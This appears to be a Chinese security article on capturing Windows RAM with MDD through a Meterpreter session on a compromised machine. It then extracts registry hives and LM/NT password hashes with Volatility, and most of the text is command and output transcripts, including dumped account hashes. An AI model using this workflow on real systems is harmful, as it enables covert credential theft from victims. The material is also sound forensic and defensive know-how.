解析内存中的数据安全隐患

安全 应用安全
ManTech MDD(http://www.mantech.com/msma/MDD.asp)是遵循GPL协议发布的,MDD可以复制以下微软操作系统内存的所有内容:WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。

ManTech MDD(http://www.mantech.com/msma/MDD.asp)是遵循GPL协议发布的,MDD可以复制以下微软操作系统内存的所有内容:WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。

从ManTech网站下载MDD后,你必须使用命令行来运行MDD程序。

MDD命令行用法

mdd -o 输出文件名

例如:

C:toolsmdd> mdd -o memory.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)

0 map operations failed

took 21 seconds to write

MD5 is: a48986bb0558498684414e9399ca19fc

输出文件通常都会涉及镜像,MDD的功能仅限于复制物理内存,所以必须利用其他工具来分析内存镜像。

这里我们使用Metasploit Meterpreter和MDD共同来完成下面的工作。

首先需要更新MDD。

meterpreter > upload /root/mdd.exe .

[*] uploading : /root/mdd.exe -> .

[*] uploaded : /root/mdd.exe -> .mdd.exe

meterpreter > ls

Listing: c:

============

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT

100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings

100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS

100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS

100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM

40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS

100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini

100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe

100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr

100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

在被攻击者的机器上执行MDD来获得RAM信息

meterpreter > execute -f "cmd.exe" -i -H

Process 1908 created.

Channel 2 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

c:> mdd.exe -o memory.dd

mdd.exe -o memory.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)

0 map operations failed

took 23 seconds to write

MD5 is: be9d1d906fac99fa01782e847a1c3144

这里,我们只需要毫不费力的运行工具,所需的数据将会被捕获下来。

meterpreter > execute -f mdd.exe -a "-o demo.dd"

Process 3436 created.

我们需要证实内存镜像已被捕获。

meterpreter > ls

Listing: C:

============

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip

100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT

100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2

100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip

100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub

100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS

100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2

40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS

100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt

100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini

100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd

100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe

100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr

100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers#p#

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share

100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .

[*] downloading: memory.dd -> .

[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

我们已得到了.dd的本地映像,现在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步骤来获取内存中的敏感信息。

附:

Volatility(https://www.volatilesystems.com/default/volatility)

$python volatility

Volatile Systems Volatility Framework v1.3

Copyright (C) 2007,2008 Volatile Systems

Copyright (C) 2007 Komoku, Inc.

This is free software; see the source for copying conditions.

There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts

For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:

connections Print list of open connections

connscan Scan for connection objects

connscan2 Scan for connection objects (New)

datetime Get date/time information for image

dlllist Print list of loaded dlls for each process

dmp2raw Convert a crash dump to a raw dump

dmpchk Dump crash dump information

files Print list of open files for each process

hibinfo Convert hibernation file to linear raw image

ident Identify image properties

memdmp Dump the addressable memory for a process

memmap Print the memory map

modscan Scan for modules

modscan2 Scan for module objects (New)

modules Print list of loaded modules

procdump Dump a process to an executable sample

pslist Print list of running processes

psscan Scan for EPROCESS objects

psscan2 Scan for process objects (New)

raw2dmp Convert a raw dump to a crash dump

regobjkeys Print list of open regkeys for each process

sockets Print list of open sockets

sockscan Scan for socket objects

sockscan2 Scan for socket objects (New)

strings Match physical offsets to virtual addresses (may take a while, VERY verbose)

thrdscan Scan for ETHREAD objects

thrdscan2 Scan for thread objects (New)

vaddump Dump the Vad sections to files

vadinfo Dump the VAD info

vadwalk Walk the vad tree

Supported Plugin Commands:

cachedump Dump (decrypted) domain hashes from the registry

hashdump Dump (decrypted) LM and NT hashes from the registry

hivelist Print list of registry hives

hivescan Scan for _CMHIVE objects (registry hives)

lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map

printkey Print a registry key, and its subkeys and values

pslist_ex_1 Print list running processes

pslist_ex_3 Print list running processes

usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. 运行hivescan得到所需偏移量

$ python volatility hivescan -f demo.dd

Offset (hex)

42168328 0x2837008

42195808 0x283db60

47598392 0x2d64b38

155764592 0x948c770

155973608 0x94bf7e8

208587616 0xc6ecb60

208964448 0xc748b60

234838880 0xdff5b60

243852936 0xe88e688

251418760 0xefc5888

252887048 0xf12c008

256039736 0xf42db38

269699936 0x10134b60

339523208 0x143cb688

346659680 0x14a99b60

377572192 0x16814b60

387192184 0x17141578

509150856 0x1e590688

521194336 0x1f10cb60

523667592 0x1f368888

527756088 0x1f74eb38

2. 运行hivelist

$ python volatility hivelist -f demo.dd -o 0x2837008

Address Name

0xe2610b60 Documents and SettingsSarahLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe25f0578 Documents and SettingsSarahNTUSER.DAT

0xe1d33008 Documents and SettingsLocalServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe1c73888 Documents and SettingsLocalServiceNTUSER.DAT

0xe1c04688 Documents and SettingsNetworkServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe1b70b60 Documents and SettingsNetworkServiceNTUSER.DAT

0xe1658b60 WINDOWSsystem32configsoftware

0xe1a5a7e8 WINDOWSsystem32configdefault

0xe165cb60 WINDOWSsystem32configSAM

0xe1a4f770 WINDOWSsystem32configSECURITY

0xe1559b38 [no name]

0xe1035b60 WINDOWSsystem32configsystem

0xe102e008 [no name]

3. Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60

Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::

phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::

ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::

Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 

【编辑推荐】

  1. 谷安天下信息安全技术培训课程介绍
  2. Linux系统安全之系统优化(2)
  3. Unix主机漏洞扫描器的设计与实现之系统安全性分析及技术概述
  4. UNIX系统安全危机评估
  5. 从堵住系统漏洞开始 保护Linux系统安全
责任编辑:佚名 来源: 比特网
相关推荐

2010-06-09 15:55:20

FTP文件传输协议

2017-02-24 08:11:09

Docker数据安全容器

2012-06-25 09:18:36

2010-09-17 14:29:23

2010-07-20 11:05:44

2016-09-29 22:09:26

2010-06-11 22:25:51

云计算安全隐患

2012-03-28 14:50:40

2009-07-06 13:38:02

2014-04-14 13:19:41

初志科技电子文档

2022-01-20 10:54:23

移动手机短信验证码隐患

2013-02-21 10:11:58

2009-03-17 09:48:00

2023-12-25 11:55:58

2011-04-13 13:54:03

HttpClient

2010-09-30 16:26:06

2014-07-03 11:01:13

mongoDB安全隐患

2019-07-23 08:56:46

IoT物联网安全

2009-09-07 16:56:02

2021-07-01 09:26:22

工业互联网网络安全数据安全
点赞
收藏

51CTO技术栈公众号